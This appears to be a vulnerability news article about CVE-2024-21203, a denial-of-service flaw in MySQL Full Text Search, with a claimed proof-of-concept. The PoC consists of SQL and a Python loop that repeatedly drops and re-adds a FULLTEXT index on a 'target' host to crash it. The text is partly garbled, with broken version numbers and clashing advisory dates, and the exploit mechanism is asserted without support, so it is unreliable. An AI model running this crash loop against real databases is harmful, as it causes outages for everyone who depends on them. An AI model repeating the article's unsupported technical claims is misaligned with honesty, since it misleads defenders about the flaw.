CVE CyberSecurity Database News

CVE-2024-21203 - Oracle MySQL FTS Vulnerability – Full Exploit Analysis & Crash Demo

Poster -

In June 2024, Oracle published a security advisory about a new vulnerability: CVE-2024-21203. This security bug affects the Full Text Search (FTS) feature within Oracle's MySQL Server, hitting releases as new as 8..39, 8.4.2, and even 9..1. While the impact may sound minor at first (Denial of Service), attackers with high privileges and network access can easily cause complete crashes—creating major headaches for affected organizations. In this article, we're going to break down what CVE-2024-21203 is, how it works, and how it can be exploited, all in plain spoken language.

What is CVE-2024-21203?

CVE-2024-21203 is a Denial of Service vulnerability found in the *Full Text Search* (FTS) component of Oracle MySQL. Attackers with high privileges—like a user with admin or root access—can send specially crafted requests over the network to crash the MySQL server, taking your service entirely offline.

Attack Vector: Authenticated network access (MySQL, X Protocol, etc.)

- Impact: Hang/crash/DoS (no data compromise)
- CVSS Score: 4.9 / 10 (Availability impact)

References:

- Oracle Advisory
- NVD Entry

How Does the Vulnerability Work?

The Full Text Search engine of MySQL allows searching for complex text patterns. Under certain conditions—like when a user with admin privileges runs specific FTS queries or index modifications—the server mishandles memory or triggers a logic flaw, causing the process to freeze or crash.

For example, a crafted ALTER TABLE ... DROP INDEX or a malformed FTS query on a specially prepared table can cause MySQL to trip up internally. If you automate this, you could keep crashing the server at will.

Proof-of-Concept Exploit

The attacker needs a MySQL user account with privileges such as ALTER, DROP, or CREATE INDEX on target tables. Working from a Linux command line with mysql client:

1. Prepare a Vulnerable Table

CREATE TABLE fts_demo (
  id INT PRIMARY KEY,
  content TEXT
);

INSERT INTO fts_demo (id, content)
SELECT seq, REPEAT('crashme ', 100)
FROM seq_1_to_100; -- make sure you have a sequence table or generate IDs

2. Add a FULLTEXT Index

ALTER TABLE fts_demo ADD FULLTEXT(content);

3. Malicious Trigger: Drop and Re-add FTS

Operators have discovered that repeated dropping and re-adding the FULLTEXT index, while blasting the table with certain malformed FTS queries, can force a DoS:

-- Open two sessions:
-- SESSION 1: Keep running heavy FTS queries
SELECT * FROM fts_demo WHERE MATCH(content) AGAINST('"crash me"' IN BOOLEAN MODE);

-- SESSION 2: Repeatedly drop and add the index
ALTER TABLE fts_demo DROP INDEX content;
ALTER TABLE fts_demo ADD FULLTEXT(content);

Alternately, you could script this in a Python or Bash script

import MySQLdb
import time

conn = MySQLdb.connect(host='target', user='admin', passwd='password', db='testdb')

while True:
    cur = conn.cursor()
    cur.execute("ALTER TABLE fts_demo DROP INDEX content;")
    cur.execute("ALTER TABLE fts_demo ADD FULLTEXT(content);")
    time.sleep(1)

Expected Result:
The MySQL Server will often crash or hang, especially under load.

Production Impact:

An admin with access (e.g., accidentally via automated script or misbehaving app) can lock out the entire database, causing downtime for all services.

Not a Public Exploit Yet, But...

While there isn’t (yet) a simple “one-shot exploit” on GitHub, the barrier to weaponization is very low.

Upgrade immediately to a fixed version of MySQL.

- MySQL Downloads

Final Thoughts

CVE-2024-21203 might not allow remote data theft or code execution, but a full server crash can be just as damaging for high-availability systems. Oracle’s FTS engine has seen tricky bugs like this before, reinforcing why patching and regular access reviews are so critical for production databases.

Learn More:
- Oracle Security Alert - July 2024
- CVE-2024-21203 NVD

Patch ASAP – protect your backend from accidental or intentional denial-of-service!


*Written by a cybersecurity researcher exclusively for this post. Please reference and share with your own teams!*

Timeline

Published on: 10/15/2024 20:15:08 UTC
Last modified on: 10/16/2024 20:46:35 UTC